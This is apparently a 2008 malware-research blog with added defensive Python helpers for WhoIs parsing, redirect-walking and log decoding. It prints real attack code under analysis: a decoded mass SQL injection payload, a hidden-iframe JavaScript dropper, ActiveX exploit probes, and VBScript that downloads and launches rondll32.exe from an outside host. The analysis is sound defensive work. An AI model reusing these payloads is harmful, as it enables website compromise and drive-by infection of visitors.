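import re

# Abridged from the RIPE output in the RapidSwitch post above.
RAPIDSWITCH_WHOIS = """inetnum: 78.129.142.0 - 78.129.142.255
netname: Rapidswitch_9
descr: Rapidswitch Ltd
country: GB
source: RIPE # Filtered

route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
source: RIPE # Filtered
"""

# Abridged from the APNIC output above.
HOSTFRESH_WHOIS = """inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
country: HK
source: APNIC
"""

INETNUM_RE = re.compile(r"^inetnum:\s*([\d.]+)\s*-\s*([\d.]+)", re.M)
ROUTE_RE = re.compile(r"^route:\s*([\d./]+)", re.M)
NETNAME_RE = re.compile(r"^netname:\s*(\S+)", re.M)


def networks_from_whois(text: str) -> list:
    """(label, IPv4Network) pairs for every inetnum range and route object in the text."""
    m = NETNAME_RE.search(text)
    label = m.group(1) if m else "unknown"
    nets = []
    for lo, hi in INETNUM_RE.findall(text):
        first, last = ipaddress.IPv4Address(lo), ipaddress.IPv4Address(hi)
        # An inetnum need not be CIDR-aligned; summarize_address_range gives the minimal list.
        nets.extend((label, n) for n in ipaddress.summarize_address_range(first, last))
    for cidr in ROUTE_RE.findall(text):
        nets.append((label, ipaddress.IPv4Network(cidr, strict=False)))
    return nets


def as_cidr_list(nets: list) -> list:
    return [str(n) for _, n in nets]


def matching_blocks(ip: str, nets: list) -> list:
    """The listed networks containing `ip`, most specific first."""
    addr = ipaddress.IPv4Address(ip)
    hits = [(label, n) for label, n in nets if addr in n]
    return sorted(hits, key=lambda ln: ln[1].prefixlen, reverse=True)


if __name__ == "__main__":
    nets = networks_from_whois(RAPIDSWITCH_WHOIS) + networks_from_whois(HOSTFRESH_WHOIS)
    print("blocks:", as_cidr_list(nets))
    for ip in ("78.129.142.9", "116.50.15.114", "67.225.157.104"):
        print(ip, [(label, str(n)) for label, n in matching_blocks(ip, nets)])
```

Note that the route object (78.129.128.0/17) is far wider than the assignment (78.129.142.0/24); the function returns both so you can decide which to act on, with the assignment listed first.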


References:

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang
http://hphosts.blogspot.com/2008/09/cr4nkws-again-another-directi.html

hpHosts Online - cr4nk.ws
http://hosts-file.net/?s=cr4nk.ws

Report Slams U.S. Host as Major Source of Badware - Security Fix
http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html

Spamhaus Blog - Cybercrime's U.S. Home
http://www.spamhaus.org/news.lasso?article=636

Thursday, 18 September 2008

AARP Site "Hack", more than just porn promotion

There's slightly more to it than just spam for the promotion of porn pages via Google. Looking through the code shows multiple redirections, a 301 followed by a 302, which eventually lead to a Cernel-hosted site that will infect the unsuspecting user with the Zlob trojan;

Start here;
http://vurl.mysteryfcm.co.uk/?url=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=4&ref=

/Begin edit 22-09-08 00:58

A check a few seconds ago, shows the aarp profile no longer exists. Alas there doesn't seem to be a cache of it either ....

/-End edit 22-09-08 00:58

Next, it leads you to;

http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/in.cgi?2&parameter=teen+galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://www.aarp.org/community/c1w2y8

If you look at the headers (displayed just above the source code), you'll notice the 301 via joyfulclipz.com followed by the 302 via breeddirect.com.

The final result is the Zlob trojan (setup.exe: 12K UPX-packed, 32K unpacked, a Visual C++ 6 file), courtesy of movsdevices.com, as shown in the source at the following.



http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/st/st.php?cat=63&script=1&url=http://www.wootmovs.com/m4/index.php?id=1117&n=teen&a=fireplace&v=2133734&preview=http://img2.joyfulclipz.com/st/thumbs/010/7598829497.jpg&p=100&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://plzwait.info/in.cgi?2&parameter=teen%20galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8

Detection for the file, packed and unpacked, is rubbish :o(

Packed (5/36)
http://www.virustotal.com/analisis/a65ca4aea5af13882b9e3c340a419922

Unpacked (1/36)
http://www.virustotal.com/analisis/9f242182ca38a09c4e050043e22b5b76

Alas I'm in the process of fixing my laptop at the moment, so I'll leave the detailed analysis of the executable to someone else.

Sites involved:

breeddirect.com (78.157.143.200)
joyfulclipz.com (78.108.177.124)
img2.joyfulclipz.com (78.108.177.124, also valid as img1-4.)
wootmovs.com (78.157.143.133)
movsdevices.com (77.91.231.201)
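The useful thing vURL did above was record each hop of the 301/302 chain without rendering what sat at the end of it. Here is an added example of that idea (mine, not vURL's code and not part of the post): a walker that reads only status codes and Location headers, resolves relative and scheme-relative Locations against the hop they came from, stops on loops and at a hop limit, and flags every host in the chain against the "Sites involved" list. The `fetch` callable is pluggable; the table-driven one used here is constructed to mirror the chain described in the post (plzwait.info, then joyfulclipz.com, then breeddirect.com, landing on movsdevices.com) and is not a real capture, and the two `.example` hosts exist only to demonstrate loop detection.

```python
"""Record a redirect chain hop by hop without rendering anything (added example)."""
from urllib.parse import urljoin, urlsplit

# Constructed responses modelled on the chain in the post: url -> (status, headers).
FAKE_RESPONSES = {
    "http://plzwait.info/in.cgi?2": (301, {"Location": "http://joyfulclipz.com/st/"}),
    "http://joyfulclipz.com/st/": (302, {"Location": "http://breeddirect.com/dl/"}),
    "http://breeddirect.com/dl/": (302, {"Location": "//movsdevices.com/setup.exe"}),  # scheme-relative
    "http://movsdevices.com/setup.exe": (200, {"Content-Type": "application/octet-stream"}),
}

# Constructed two-host loop, purely to exercise the loop guard.
LOOP_RESPONSES = {
    "http://a.example/": (302, {"Location": "http://b.example/"}),
    "http://b.example/": (302, {"Location": "http://a.example/"}),
}

# The "Sites involved" list from the post.
BLOCKLIST = {"breeddirect.com", "joyfulclipz.com", "wootmovs.com", "movsdevices.com"}

REDIRECT_CODES = (301, 302, 303, 307, 308)


def table_fetch(responses: dict):
    """Build a fetch(url) -> (status, headers) callable from a response table."""
    def fetch(url):
        return responses.get(url, (404, {}))
    return fetch


def follow_chain(start: str, fetch, max_hops: int = 10) -> list:
    """Walk redirects from `start`, returning one dict per hop; never fetches a body."""
    hops, seen, url = [], set(), start
    while len(hops) < max_hops:
        if url in seen:
            hops.append({"url": url, "status": None, "note": "loop"})
            break
        seen.add(url)
        status, headers = fetch(url)
        hop = {"url": url, "status": status, "host": urlsplit(url).hostname}
        hops.append(hop)
        location = headers.get("Location") or headers.get("location")
        if status in REDIRECT_CODES and location:
            url = urljoin(url, location)  # handles relative and scheme-relative values
            continue
        hop["content_type"] = headers.get("Content-Type") or headers.get("content-type")
        break
    else:
        hops.append({"url": url, "status": None, "note": "hop limit reached"})
    return hops


def flagged_hosts(hops: list, blocklist=BLOCKLIST) -> list:
    """Hosts in the chain, in order, that appear on the blocklist."""
    return [h["host"] for h in hops if h.get("host") in blocklist]


if __name__ == "__main__":
    chain = follow_chain("http://plzwait.info/in.cgi?2", table_fetch(FAKE_RESPONSES))
    for h in chain:
        print(h)
    print("flagged:", flagged_hosts(chain))
    print("loop:", follow_chain("http://a.example/", table_fetch(LOOP_RESPONSES))[-1])
```

To run it against a live chain you would supply a fetch callable backed by an HTTP client with automatic redirects disabled, returning only the status and headers; the walker itself never needs the response body.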

References:

AARP Site Hacked and Spammed
http://www.mxlogic.com/itsecurityblog/1/2008/09/AARP-Site-Hacked-and-Spammed.cfm

Porn Operators Hijack Pages on AARP Website
http://www.darkreading.com/document.asp?doc_id=164115&f_src=darkreading_section_296

Knew I'd find the original reference that led me to this ;o)

Porn Operators Hijack Pages on AARP Website
http://temerc.com/forums/viewtopic.php?f=4&t=5780

Penguin Panic!

Thar be a new infected e-mail floating round folks. This one comes with a variety of subjects, and so far, a single zip - penguin.panic.zip, which of course, contains an executable (14K) of the same name.

http://www.virustotal.com/analisis/120fb641310e4704565ef683ca33b2d0

The executable does contain a little string that seems to lay claim to its origins being those of "Botnet Jack";



Subjects I've seen thus far;

Take a break!
Apple: The most popular game!
iPhone's most popular game!
Apple presents iPhone games!
Play iPhone on your PC today.

Content of the e-mails that I've seen thus far include;

Beet my score! (7000 points)!
Steve Jobs presents iPhone!
Take a break!
Famous iPhone games!
iPhone's most popular game!

Needless to say folks, if you receive this, delete it!

References:

hi, botnet Jack here
http://blogs.law.harvard.edu/zeroday/2008/09/18/hi-botnet-jack-here/

Sporadic e-mail issues

Alas I must've annoyed someone at FastHosts hehe*

Over the past few days, I've noticed a sporadic issue with my being able to connect to my incoming mail server, meaning I can only occasionally receive mail. I've already spoken to my host, and they're going to get in touch with FastHosts about it. In the meantime, however, if I don't respond to your e-mail straight away, please be patient - it's not my fault!

* Poor attempt at a joke

Tuesday, 16 September 2008

EstDomains now allowing WhoIs queries

I was investigating hiskyhost.net (AS43355), due to the fact that I've now got 48 domains going through them that are associated with malware. More interestingly, they all resolve to housing.hiskyhost.net - a hostname that does not itself actually resolve to an IP;

http://hosts-file.net/?s=housing.hiskyhost.net

During the course of the investigation, I decided to do a WhoIs query. Prior to my trying today, EstDomains had never allowed WhoIs queries, instead opting either to refuse access to their WhoIs server or, as is the case with whois.internet.bs, to return complete rubbish (i.e. when querying whois.internet.bs, their WhoIs server will return "D D"). In October 2007, I noticed their server consistently returning the following, irrespective of the domain being queried;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.internic.net

An I/O error occured while sending to the backend.

WhoIs server: whois.estdomains.com


Having done a WhoIs query via the EstDomains website, I decided to try modifying the hpHosts site to do the query directly against their WhoIs server - and what did it return? Surprisingly, it returned the same data as their web interface - something it had never done before;

WhoIs Information:

Referred to: whois.estdomains.com
By: whois.crsnic.net

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: HISKYHOST.NET

Registrant:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
ns2.hiskyhost.net
ns1.hiskyhost.net


Administrative Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Technical Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Billing Contact:
High Sky Hosting
Alexey Vorobiev (admin@hiskyhost.net)
ul Oleko Dundicha 5
S Petersburg
null,192283
RU
Tel. +7.9214598211

Status:ACTIVE


What I am rather interested in however, is their possible connection to hiskyhost.net, 2checkout.com and internet.bs.

As a side note, I've also noticed some of those that previously resolved to housing.hiskyhost.net (e.g. mcdirecting.com), though still going through EstDomains, now resolving to the VDHost Ltd/Ultranet (AS35057) netblock;

http://hosts-file.net/?s=78.157.143.133&sDM=1#matches

This also, of course, begs the question of whether there is any relation between these and EstDomains as well? Or whether it's just me being overly suspicious. Either way, if EstDomains are serious about taking malicious domains offline (and I doubt they are - more likely they're just doing it until they're out of the headlines, so to speak), then they need to take both those on VDHost/Ultranet and those on HiskyHost offline - as shown by the following, someone's already disabled some of them;

http://hosts-file.net/misc/Hiskyhost_-_VDHost_-_EstDomains.html

In the meantime, hopefully they'll continue to allow access to their WhoIs server, and not "accidentally" disable it??? Time will tell.

Monday, 15 September 2008

Injection via Hex encoded SQL

I'm not surprised when I see injection attempts against my servers anymore, but I am surprised that they're still going with the same domain. The domain that they've used in this particular attack is one that I saw a couple of months or so ago (though I'm not surprised that the domain is still online, due to where it's hosted).

The entry in my server log for this one is;

Attacker: 116.232.98.101

2008-09-15 22:30:52 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:30:55 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0
2008-09-15 22:31:51 GET /misc/cyberdefender/CDESGAd_100507_Full.txt ';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); 80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) - mysteryfcm.co.uk 200 0 0


The hex we're interested in is the part that begins with 0x and ends with F72 (look just before %20AS%20CHAR, since %20 is just the space character). If we decode the hex, we end up with;

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
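To catch these in bulk rather than by eye, here's a small Python script (an added example for this post, not the post author's or hpHosts' code) that splits IIS W3C log lines in the field order shown above, spots the CAST(0x...)/EXEC(@S) shape, decodes the hex (single-byte for CHAR/VARCHAR, UTF-16LE for the NCHAR/NVARCHAR variant of the same kit) and checks the result for tell-tale tokens. The sample log line is constructed here; its hex payload is a harmless placeholder statement, not the attacker's cursor loop.

```python
"""Detect and decode hex-encoded T-SQL injection in IIS W3C log lines.

Added example for this post (not the hpHosts author's code). The sample log
line is constructed to match the field order of the entries above; its 0x...
payload is built here from a harmless placeholder statement.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Shape used by the 2008 mass-injection kits:
#   DECLARE @S CHAR(4000);SET @S=CAST(0x... AS CHAR(4000));EXEC(@S);
CAST_HEX = re.compile(
    r"CAST\(\s*0x(?P<hex>[0-9A-Fa-f]+)\s+AS\s+(?P<type>N?(?:VAR)?CHAR)\s*(?:\(\d+\))?\s*\)",
    re.IGNORECASE,
)
EXEC_VAR = re.compile(r"EXEC\s*\(\s*@\w+\s*\)", re.IGNORECASE)

# Tokens that have no business in a legitimate query string once decoded.
SUSPICIOUS_TOKENS = ("sysobjects", "syscolumns", "Table_Cursor", "<script", "xp_cmdshell")

# IIS W3C field order as logged in the post (14 fields, space separated).
FIELDS = ("date", "time", "method", "stem", "query", "port", "username",
          "client_ip", "user_agent", "referer", "host", "status", "substatus", "win32_status")


def parse_iis_line(line: str) -> dict:
    """Split one W3C log line into named fields; IIS encodes spaces inside
    fields (%20 or +), so a plain split on the single space is safe."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def decode_hex_payload(hex_digits: str, sql_type: str) -> str:
    """Recover the statement from the 0x literal. A CAST to an N-type means the
    bytes are UTF-16LE (NCHAR/NVARCHAR); CHAR/VARCHAR is single-byte text."""
    raw = bytes.fromhex(hex_digits)
    if sql_type.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def inspect_line(line: str) -> Optional[dict]:
    """Return a finding for a line carrying CAST(0x...)/EXEC(@var), else None."""
    rec = parse_iis_line(line)
    query = unquote(rec["query"])          # %20 -> space, etc.
    m = CAST_HEX.search(query)
    if m is None or EXEC_VAR.search(query) is None:
        return None
    decoded = decode_hex_payload(m["hex"], m["type"])
    lowered = decoded.lower()
    indicators = [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]
    return {
        "client_ip": rec["client_ip"],
        "stem": rec["stem"],
        "sql_type": m["type"].upper(),
        "decoded": decoded,
        "indicators": indicators,
    }


# --- constructed sample input --------------------------------------------
# Placeholder statement standing in for the attacker's cursor loop; it only
# names a system table so that the indicator matching has something to find.
PLACEHOLDER_SQL = "select a.name from sysobjects a /* placeholder */"
PLACEHOLDER_HEX = PLACEHOLDER_SQL.encode("latin-1").hex().upper()

SAMPLE_LINE = (
    "2008-09-15 22:30:52 GET /misc/cyberdefender/CDESGAd_100507_Full.txt "
    "';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x" + PLACEHOLDER_HEX
    + "%20AS%20CHAR(4000));EXEC(@S); "
    "80 - 116.232.98.101 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) "
    "- mysteryfcm.co.uk 200 0 0"
)
BENIGN_LINE = ("2008-09-15 22:31:00 GET /index.html - 80 - 10.0.0.5 "
               "Mozilla/4.0+(compatible) - mysteryfcm.co.uk 200 0 0")


if __name__ == "__main__":
    for raw_line in (SAMPLE_LINE, BENIGN_LINE):
        finding = inspect_line(raw_line)
        print("clean" if finding is None else finding)
```

Run inspect_line over each line of the real log; a non-None result is a hit. Note that the server answered 200 to all four requests above, so the status column alone tells you nothing here, which is why the decoded body is what you look at.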


This tells us that it is a SQL injection payload which, rather than going after one table, opens a cursor over every text-type column of every user table (sysobjects.xtype='u'; column types 99, 35, 231 and 167 are ntext, text, nvarchar and varchar) and prepends a script tag pointing at www0.douhunqn.cn to each value that doesn't already carry it, so every page that renders the data serves the script. What does this script contain? The following of course;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/w.js
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 3
Date: 16 September 2008
Time: 02:21:49:21
*****************************************************************
window.onerror=function()
{
document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
return true;
}
if(typeof(js2eus)=="undefined")
{
var js2eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');


document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


This script is detected by AntiVir as JS/Dldr.IFrame.CR

You'll also notice that it grabs new.htm from the same domain. This is detected as HTML/IFrame.UX, and contains;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/new.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 4
iFrames: 9
Date: 16 September 2008
Time: 02:23:51:23
*****************************************************************
<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=06014.htm width=100 height=0></iframe>
<iframe src=flash.htm width=100 height=0></iframe>
<Iframe src=net.htm width=100 height=0></iframe>
<Iframe src=ff.htm width=100 height=0></iframe>
<Iframe src=tr.htm width=100 height=0></iframe>

<script>
var kaspersky="ffuck"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real10.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}
catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script src="http://js.users.51.la/2094465.js"></script>

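Following the chain by hand gets tedious fast, so here is an added Python helper (mine, not the post author's or vURL's) that lists every iframe/script source on a captured page, resolves relative ones against the page URL, and reports which ActiveX ProgIDs the inline script probes once the two cheap obfuscations above are undone: hex escapes such as the backslash-x sequence in the first try block (which spells GLIEDown.IEDown.1) and the "MP"+"S.S"+... literal splitting. SAMPLE_HTML is constructed here from the new.htm tags shown above; the base URL is the page's.

```python
"""Static walk of a captured landing page: what it pulls in, what it probes.

Added example, not the hpHosts author's tooling. SAMPLE_HTML is constructed
from the tags in the new.htm capture; the base URL is the page's own.
"""
import re
from urllib.parse import urljoin, urlparse

# <iframe ... src=...> and <script ... src=...> in document order; the src
# value may be bare, single- or double-quoted (all three forms occur above).
SRC_TAG = re.compile(r"<(iframe|script)\b[^>]*?\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)
# backslash-x NN inside a JS string literal
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
# "abc" + "def"  ->  "abcdef"  (double-quoted literals only, no escapes inside)
ADJACENT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
# new ActiveXObject("ProgID")  or  new window["ActiveXObject"]("ProgID")
ACTIVEX = re.compile(r'ActiveXObject(?:"\])?\s*\(\s*["\']([^"\']+)["\']')


def deobfuscate_js_strings(js: str) -> str:
    """Resolve hex escapes first, then fold chains of concatenated literals
    until nothing changes."""
    js = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)
    while True:
        folded = ADJACENT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
        if folded == js:
            return folded
        js = folded


def extract_references(html: str, base_url: str) -> list:
    """(kind, absolute URL) for every iframe/script src, including the ones
    that only exist inside document.write() strings."""
    return [(kind.lower(), urljoin(base_url, src)) for kind, src in SRC_TAG.findall(html)]


def find_activex_probes(html: str) -> list:
    """ProgIDs handed to ActiveXObject once the string obfuscation is undone."""
    return ACTIVEX.findall(deobfuscate_js_strings(html))


def analyze_page(html: str, base_url: str) -> dict:
    """One report per captured page: references, probes, third-party hosts."""
    refs = extract_references(html, base_url)
    own_host = urlparse(base_url).hostname
    external = sorted({urlparse(u).hostname for _, u in refs if urlparse(u).hostname != own_host})
    return {"references": refs, "activex": find_activex_probes(html), "external_hosts": external}


# Constructed sample, shaped like the new.htm capture above (raw string so the
# backslash-x escapes reach the analyser untouched).
SAMPLE_HTML = r"""<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=06014.htm width=100 height=0></iframe>
<Iframe src=net.htm width=100 height=0></iframe>
<script>
try{if(new window["ActiveXObject"]("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31"))window["document"]["write"]('<iframe style=display:none src="lzx.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("MP"+"S.S"+"tor"+"mPl"+"ayer"))window["document"]["write"]('<iframe style=display:none src="Bfyy.htm"></iframe>');}catch(e){}
</script>
<script src="http://js.users.51.la/2094465.js"></script>
"""

if __name__ == "__main__":
    report = analyze_page(SAMPLE_HTML, "http://www0.douhunqn.cn/csrss/new.htm")
    for kind, url in report["references"]:
        print(f"{kind:7} {url}")
    print("ActiveX probes:", report["activex"])
    print("third-party hosts:", report["external_hosts"])
```

This is purely static: it only sees string literals, so a payload that assembles its ProgIDs from variables the way the VBScript in 06014.htm does (gameee3&gameee4&giceeee) needs a sandboxed script interpreter rather than a regex.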

Oh dear, this is getting a little messy, isn't it? Let's see what this does, shall we.

http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605

This is a counter that, presumably, tells them how many times the script has been loaded.

http://www0.douhunqn.cn/csrss/06014.htm

This is the HTML/Rce.Gen infection, and gives us a lovely little executable called rondll32.exe (19.8KB), lovingly downloaded from ppexe.com (Ref: hpHosts Listing);

http://www.ppexe.com/csrss/rondll32.exe

It's fetched via Microsoft.XMLHTTP, written to the temp folder (located through the FileSystemObject, part of the Microsoft Scripting Runtime) with ADODB.Stream as Gameeeeeee.pif, and then launched via a generated .vbs through Shell.Application; note how every ProgID and CLSID is split across variables so a simple string match on the page won't find them. For some peculiar reason, my attempts to download rondll32.exe failed (the download kept timing out).

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://www0.douhunqn.cn/csrss/06014.htm
Server IP: 121.11.76.85 [ Resolution failed ]
hpHosts Status: Listed [ Class: EXP ]
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 6
iFrames: 0
Date: 16 September 2008
Time: 02:31:35:31
*****************************************************************
<script language=VBScript>
On Error Resume Next
gameee = "http://www.ppexe.com/csrss/rondll32.exe"
Set gameee_2_cn = document.createElement("object")
gameeeid="clsid:"
gameeeidx="BD"
gameeeid2="96"
gameeeid3="C5"
gameeeid4="56-6"
gameeeid5="5A"
gameeeid6="3-1"
gameeeid7="1D"
gameeeid8="0-98"
gameeeid9="3A-0"
gameeeid10="0C0"
gameeeid11="4FC"
gameeeid12="29E"
gameeeid13="36"
dadong="classid"
gameee3="Micro"
gameee4="soft.XM"
giceeee="LHTTp"
gameee5="G"
gameee6="E"
gameee7="T"
gameee_2_cn.SetAttribute dadong, gameeeid&gameeeidx&gameeeid2&gameeeid3&gameeeid4&gameeeid5&gameeeid6&gameeeid7&gameeeid8&gameeeid9&gameeeid10&gameeeid11&gameeeid12&gameeeid13
Set lovegameee=gameee_2_cn.CreateObject(gameee3&gameee4&giceeee,"")
lovegameee.Open gameee5&gameee6&gameee7, gameee, False
lovegameee.Send
gameee_kiteggggggggg="Gameeeeeee.pif"
gameee_kitegggggggggs="Gameeeeeee.vbs"
Q123456="Scripting."
Q123456s="FileSyst"
Q123456ss="emObject"
Q123456sss="Adod"
Q123456sssx="b.stream"
Q123456sssss=Q123456sss&Q123456sssx
Set chilam = gameee_2_cn.createobject(Q123456&Q123456s&Q123456ss,"")
Set yingying = chilam.GetSpecialFolder(2)
gameeeuser="chilam"
gameee_kiteggggggggg=chilam.BuildPath(yingying,gameee_kiteggggggggg)
gameee_kitegggggggggs=chilam.BuildPath(yingying,gameee_kitegggggggggs)
Set chilams = gameee_2_cn.createobject(Q123456sssss,"")
chilams.type=1
chilams.Open
chilams.Write lovegameee.ResponseBody
</script>
<script language="JavaScript">
chilams["Savetofile"](gameee_kiteggggggggg,2);
</script>
<script language=VBScript>
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Set Love_gameee = CreateObject(""Wscript"&".Shell"")"&"'I LOVE gameee TEAM"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"&vbCrLf&"Love_gameee.run ("""&gameee_kiteggggggggg&""")"&vbCrLf&"'I LOVE gameee TEAM"&"'I LOVE gameee TEAM"
chilams.Savetofile gameee_kitegggggggggs,2
chilams.Close
www="She"
